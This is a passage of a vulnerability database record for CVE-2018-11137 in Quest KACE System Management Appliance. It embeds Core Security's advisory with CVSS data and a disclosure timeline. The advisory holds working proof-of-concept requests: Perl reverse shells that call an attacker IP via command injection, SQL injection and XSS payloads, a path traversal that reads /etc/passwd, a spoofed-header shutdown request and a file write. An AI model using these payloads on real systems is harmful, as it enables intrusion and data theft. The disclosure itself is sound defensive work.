"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0597",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11137"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11137",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11137",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-15642",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11137",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11137",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-15642",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1217",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-11137",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 can be abused to read arbitrary files with \u0027www\u0027 privileges via Directory Traversal. No administrator privileges are needed to execute this script. Quest KACE Systems Management Appliance Contains a path traversal vulnerability.Information may be obtained. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A path traversal vulnerability exists in the QuestKACESystemManagementAppliance 8.0.318 release. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. 
*Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. 
\n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. 
\n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. 
\n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). 
\n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. 
*Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 
8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. 
\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). 
\nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. 
\n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. 
Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. 
Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. 
